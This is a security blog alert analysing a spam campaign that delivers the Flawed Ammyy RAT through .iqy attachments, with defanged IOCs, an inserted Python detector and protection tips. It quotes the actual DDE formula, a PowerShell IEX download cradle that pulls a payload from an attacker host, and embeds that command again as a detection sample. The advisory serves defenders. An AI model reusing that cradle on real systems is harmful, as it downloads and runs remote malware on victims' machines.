Security Alert: New Spam Campaign Delivers Flawed Ammyy RAT to Infect Victims’ Computers


There is no doubt that malware remains one of the best-known and most dangerous online threats users face on a daily basis. Malicious actors use it in various cyber attacks to steal personal information, gain full access to a computer system and do whatever they want on the PC.

This is the case with Remote Administration Tools (RATs), which cybercriminals use to remotely take full control of Windows PCs and infect them with malware.

Security researchers recently observed and analyzed a new spam campaign in which a RAT dubbed Flawed Ammyy was used as the payload.

The name comes from a legitimate program, Ammyy Admin Remote Desktop Software version 3, used by more than 75 million home and business users. This RAT has previously been used in other targeted email attacks and spam campaigns.

How does the Flawed Ammyy RAT spread?

In the observed spam campaign, malicious actors can easily take full control of victims’ machines if the victims open the document received via email.

Keep in mind that this attack uses an Excel Web Query File (.iqy) attachment, a type of file used to download data from the Internet and copy it directly into an Excel sheet.

The unwanted email comes with the following content (sanitized for your own protection):

Subject Line:

Attachment: -> img_005.iqy

If a victim opens the attached file and clicks it, the Flawed Ammyy RAT will be downloaded, and malicious actors will be running it from this location: http://24hourssupports[.]com/img01.gif (sanitized for your safety)

The malicious file is essentially a one-line launcher: it contains a DDE formula that runs the following PowerShell command:

=cmd|' /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoLogo -c IEX ((new-object net.webclient).downloadstring("http://24hourssupports[.]com/img02.gif"))'!A0

As shown, this PowerShell command downloads a second script (img02.gif), which starts a cmd.exe session and drops a “cmd_.exe” file into the Windows temporary folder.
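As an added defensive illustration (example code written for this alert, not Heimdal’s or the researchers’ tooling), the following Python checks an .iqy attachment and the content its URL returns for the two tell-tale signs described above: a DDE launcher formula of the `=cmd|'...'!A0` form and a PowerShell download cradle. The sample query file and fetched body are constructed from the defanged values in this alert, and the allowlist of trusted hosts is a hypothetical placeholder.

```python
"""Scan an Excel Web Query (.iqy) file and the body it fetches for the
launcher pattern used in this campaign. Sample inputs below are constructed."""
import re

# .iqy files are plain text: a "WEB" header, a version line, then the URL.
def parse_iqy(text):
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    return {"version": lines[1], "url": lines[2], "extra": lines[3:]}

# DDE launcher: =cmd|' ... '!A0 (the app name and cell reference may vary).
DDE_LAUNCHER = re.compile(r"^\s*=\s*\w+\s*\|\s*'.*'\s*!\s*[A-Za-z]+\d+", re.M)
# PowerShell download cradle: powershell ... IEX ... webclient/downloadstring.
PS_CRADLE = re.compile(r"powershell(\.exe)?.*?(IEX|Invoke-Expression).*?"
                       r"(downloadstring|downloadfile|webclient)", re.I | re.S)
ALLOWED_HOSTS = {"example.com"}  # hypothetical allowlist of trusted query hosts

def assess_iqy(iqy_text, fetched_body=""):
    """Return findings for an .iqy file and, optionally, the body its URL
    returned (retrieve that body in a sandbox, never on the user's endpoint)."""
    findings = []
    q = parse_iqy(iqy_text)
    if q is None:
        return ["not a WEB query file"]
    host = re.sub(r"^https?://", "", q["url"]).split("/")[0].lower()
    if host not in ALLOWED_HOSTS:
        findings.append(f"query to untrusted host: {host}")
    if q["url"].lower().startswith("http://"):
        findings.append("cleartext http query")
    for body, label in ((iqy_text, "attachment"), (fetched_body, "fetched content")):
        if DDE_LAUNCHER.search(body):
            findings.append(f"DDE launcher formula in {label}")
        if PS_CRADLE.search(body):
            findings.append(f"PowerShell download cradle in {label}")
    return findings

# Constructed samples mirroring this campaign (domains kept defanged).
SAMPLE_IQY = "WEB\n1\nhttp://24hourssupports[.]com/img01.gif\n"
SAMPLE_FETCHED = ("=cmd|' /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
                  "-nop -NoLogo -c IEX ((new-object net.webclient).downloadstring"
                  "(\"http://24hourssupports[.]com/img02.gif\"))'!A0\n")

if __name__ == "__main__":
    for finding in assess_iqy(SAMPLE_IQY, SAMPLE_FETCHED):
        print("FINDING:", finding)
```

A mail gateway can apply the same checks to every .iqy attachment before it reaches Excel, where the query is otherwise executed after a single prompt.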

After that, the Flawed Ammyy RAT is configured so that attackers can connect to the infected machine, communicate with the C&C server at the IP address 169.239.128[.]149 and perform malicious activities.

Security researchers have also found that the same server has been used for phishing attacks against iCloud and iTunes accounts:

appleid.itunes.kontolasumeme[.]com
appleid.icloud.asuppepekmemek[.]com

According to VirusTotal, only 3 antivirus products out of 60 had detected this malicious .iqy file at the time of writing this security alert. This means it can bypass antivirus filters, and another security layer is needed to enhance protection.

Heimdal Security proactively blocked these malicious domains, so all our Heimdal PRO and Heimdal CORP users are protected.

How to protect your computer from RATs

This type of malware can evade detection in the first place, so it’s essential to take all the security measures needed to keep your data safe.

  • Update your operating system, including all your apps and software programs, because unpatched software is the first place malicious actors look to exploit vulnerabilities;
  • We keep reminding you of this: DO NOT open emails or click on files/attachments that look suspicious to you;
  • Always keep a backup of all your important data on external storage such as a hard drive or in the cloud (Google Drive, Dropbox, etc.). Use this guide to learn how to do it;
  • Make sure you have a reliable antivirus program installed on your computer to protect your valuable data from online threats;
  • Use multiple layers of protection and consider installing a proactive cyber security software solution;
  • Prevention is always recommended, so learning as much as possible about how to better detect spam campaigns is the right mindset. We recommend these free educational resources to gain more knowledge in the cybersecurity industry.

Stay safe and don’t click everything you get in your inbox!


* This article features cyber intelligence provided by CSIS Security Group researchers.

The post Security Alert: New Spam Campaign Delivers Flawed Ammyy RAT to Infect Victims’ Computers appeared first on Heimdal Security Blog.
